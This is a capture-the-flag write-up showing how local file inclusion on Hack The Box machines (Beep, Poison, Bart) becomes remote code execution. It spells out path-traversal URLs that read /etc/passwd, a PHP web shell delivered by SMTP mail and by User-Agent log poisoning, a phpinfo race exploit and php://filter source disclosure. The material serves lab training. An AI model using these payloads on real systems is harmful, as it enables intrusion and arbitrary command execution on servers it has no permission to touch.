Hi, here we will see some things which we can do with LFI. And combining this info how we can get RCE.
1. Turning LFI into RCE by sending emails via SMTP
Note: This scenario is in HTB Beep Machine. SMTP server is also running on the machine at port 25.
We start with a basic LFI
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
a. Identifying user with which current process is running-
Basically, /proc/self/ represents the process that’s reading /proc/self/. So if we try to open /proc/self/ from a C program then it represents that program. If you we to do it from the shell then it is that shell…
/proc/self/status
/proc/self/environ #for environment variables
/proc/net/dev #network interfaces
/proc/net/tcp #listening ports in hexadecimal
/proc/sys/kernel/hostname #viewing hostname
/proc/self/cmdline #getting the command which ranif we try to read the contents of “/proc/self/status” then it will output information related to current process which is reading its contents. let’s see the output of this-
Interesting things for us are gid and uid of the process. As we have have output of /etc/passwd . We can use this information to find the user with which this process is executing.
We found the username asterisk
b. Sending email to asterisk user with php code in message-
i) Connecting to smtp server using telenet.
telnet 10.10.10.7 25
wait for the server banner
ii) Start a conversation with the server by identifying ourselves to the server-
EHLO golu@n00ky.cc
We can use any random email address. Server returns the commands available to use.
iii) We can verify if the user asterisk exists via VRFY command-
VRFY asterisk@beep.localdomain
iv) Sending an email to asterisk@beep.localdomain-
MAIL FROM:golu@n00ky.cc First, we specify the sender using MAIL FROM
RCPT TO:asterisk@beep.localdomainThen we specify the recipient using RCPT TO
DATAEnter DATA then wait for a prompt specifying how to end DATA.
<?php echo system($_REQUEST['cmd']);?>.
After entering the DATA press <Enter> twice and then enter ‘.’ then again <Enter>. Finally, we sent the mail.
Note: Each <Enter> here means <CR><LF>
c. Getting RCE via LFI-
Checking the mbox file of the asterisk user via LFI..
/var/mail/asterisk
Observe this blank space in the output. This is due to the fact that our PHP code is being interpreted as PHP and being executed.
Now we just need to send our commands in the cmd parameter.
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//var/mail/asterisk%00&module=Accounts&action&cmd=id
Thanks For reading! I have learned about this in the Beep walkthrough by IPSec Hope you learned something new. (at least i did :)
Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)
References:
2. Turning LFI to RCE using log poisoning-
A)Note: This scenario is in HTB Poison Machine.
If we are able to write PHP code to access logs of a web server and if it is possible to access this log file via LFI. We can potentially get code execution. Let’s see this in action..
From the Nmap scan, we determine the operating system is OpenBSD.
a. Finding location of log file-
Then we need to find the location of log file again from nmap output we got to know which web server is running and by google search we can find the location of access log.(which is /var/log/httpd-access.log)
Let’s try to read this via LFI-
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log
Now we will be sending our php payload in the user agent http header, which will be saved in this log file and upon accessing this log file via LFI apache web server should execute our payload.
b. Sending payload in User-Agent header-
<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); }?></pre></body><script>document.getElementById("cmd").focus();</script></html>
c. Getting RCE-
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id
B)Note: This scenario is in HTB BART Machine.
a) Here we start with a chat application which has functionality to log chats.
b) Upon viewing javascript in source, We came to know that it is doing a GET request to log.php and passing filename and username as parameters.
function saveChat() {
// create a serialized object and send to log_chat.php. Once done hte XHR request, alert "Done"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText);
}
}
xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);
xhr.send(null);
alert("Done");
http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey
c) Upon checking the file name We confirmed that indeed file is being created and User agent string is being saved in the file.
http://internal-01.bart.htb/log/log.txt
d) As you might have guessed we can write our php code in the user agent string and can store this file as any name we want.
e) So we just modified the user agent string and replaced it with our web shell and given name lol.php to the file.
Thanks For reading!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
3. Turning LFI to RCE using phpinfo to upload php code:-
Note: This scenario is in HTB Poison Machine.
http://10.10.10.84/phpinfo.php
If file_uploads option is enabled. Then we can upload file via post request to phpinfo.php. PHPinfo quickly deletes this file once its stops loading. So we need to win race condition to be able to run our code via LFI. More info can be read from the pdf below.
https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf
python phpinfolfi.py 10.10.10.84 80 100— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Using PHP Filters in LFI:
For reading files we can use plain filter
For reading source code we can use base64 encode filter.
http://10.129.89.85/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php
Thanks For reading!
